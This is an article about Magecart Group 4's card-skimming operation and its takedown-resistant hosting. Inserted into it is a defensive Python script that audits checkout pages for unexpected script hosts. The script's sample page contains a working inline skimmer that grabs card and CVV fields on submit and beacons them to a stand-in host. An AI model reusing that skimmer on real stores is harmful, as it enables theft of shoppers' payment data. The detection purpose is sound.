There are at least a dozen Magecart groups trying to plant card-skimming code on online stores, but not all of them are equally advanced. Group 4 has taken the activity to a professional level.
The way the group runs its operation points to an actor capable of finding new ways to keep the activity going, minimizing its risk, and refining its tooling.
Magecart groups have been active since 2015. Their technique is to inject a malicious script into web pages that carry a payment form; the script captures the card data the customer types in at checkout and steals it.
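Because the skimmer has to run on the checkout page itself, one cheap defensive check is to audit which hosts serve scripts on that page and which inline scripts hook the payment form. The following is an added example, not code from the article or from the RiskIQ/Flashpoint report; the allowlist, the page host `shop.example`, the skimmer host `static.example-cdn.invalid` and the sample checkout HTML are all constructed for illustration.

```python
"""Audit a checkout page for scripts that do not belong there.

Two heuristics that catch the common Magecart pattern:
  1. a <script src> served from a host that is not on the shop's allowlist;
  2. an inline script that both hooks the payment form's submit and
     contains a beacon primitive (Image, XHR, fetch, sendBeacon) to ship
     the captured fields somewhere.
All hosts and the sample page below are constructed test data.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the shop expects to serve scripts from.
EXPECTED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example", "js.stripe.com"}

FORM_HOOK_MARKERS = ("submit", "onsubmit")
BEACON_MARKERS = ("new Image(", "XMLHttpRequest", "fetch(", "sendBeacon")


class ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external = []      # values of <script src=...>
        self.inline = []        # bodies of <script>...</script>
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def script_host(src, page_host):
    """Host that serves a script; relative and root-relative URLs resolve to the page host."""
    parsed = urlparse(src.strip())
    return (parsed.hostname or page_host).lower()


def audit_checkout_page(html, page_host, allowed_hosts=EXPECTED_SCRIPT_HOSTS):
    """Return a list of (finding_kind, detail, evidence) tuples; empty means nothing flagged."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.external:
        host = script_host(src, page_host)
        if host != page_host.lower() and host not in allowed_hosts:
            findings.append(("unexpected-script-host", host, src))
    for body in collector.inline:
        hooks_form = any(m in body for m in FORM_HOOK_MARKERS)
        beacons = [m for m in BEACON_MARKERS if m in body]
        if hooks_form and beacons:
            findings.append(("inline-form-hook-with-beacon", ",".join(beacons), body.strip()[:80]))
    return findings


# Constructed sample: a legitimate checkout page with one injected skimmer.
SAMPLE_CHECKOUT_HTML = """
<html><head>
<script src="/static/checkout.js"></script>
<script src="https://js.stripe.com/v3/"></script>
<script src="//cdn.shop.example/lib/jquery.min.js"></script>
<script src="https://static.example-cdn.invalid/analytics.js"></script>
</head><body>
<form id="payment"><input name="cc"><input name="cvv"></form>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = {};
  document.querySelectorAll('#payment input').forEach(function (i) { d[i.name] = i.value; });
  new Image().src = 'https://static.example-cdn.invalid/p.gif?d=' + btoa(JSON.stringify(d));
});
</script>
</body></html>
"""

if __name__ == "__main__":
    for kind, detail, evidence in audit_checkout_page(SAMPLE_CHECKOUT_HTML, "shop.example"):
        print(f"{kind}: {detail} | {evidence}")
```

The host check is the part worth automating against every deploy, since the infrastructure described in this article is exactly what it surfaces: a domain the shop never chose to load a script from. The inline heuristic is deliberately loose and will need tuning per site; legitimate checkout code also hooks submit events, so treat a hit as a prompt to read the script, not as proof of compromise.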
Carefully organized infrastructure
According to RiskIQ, a cyber-security company that tracks and classifies Magecart groups, one operator stands out from the rest.
In collaboration with Flashpoint, the company released a detailed report on the Magecart adversary, describing the tactics observed.
After taking down parts of the infrastructure used by Group 4, RiskIQ was able to keep monitoring the group and watched the operation evolve.
With about 100 registered domains and a pool of servers that route them and serve the skimming code to victims, the researchers see the group as “one of the most advanced groups we’ve encountered given their rich history in the e-crime ecosystem.”
After reorganizing, the group now hosts at most five domains on any one IP address and makes sure none of its addresses are shared with domains outside its control. Keeping hosting unshared limits what an investigator can pivot to from a single IP and limits how much of the operation a single takedown removes.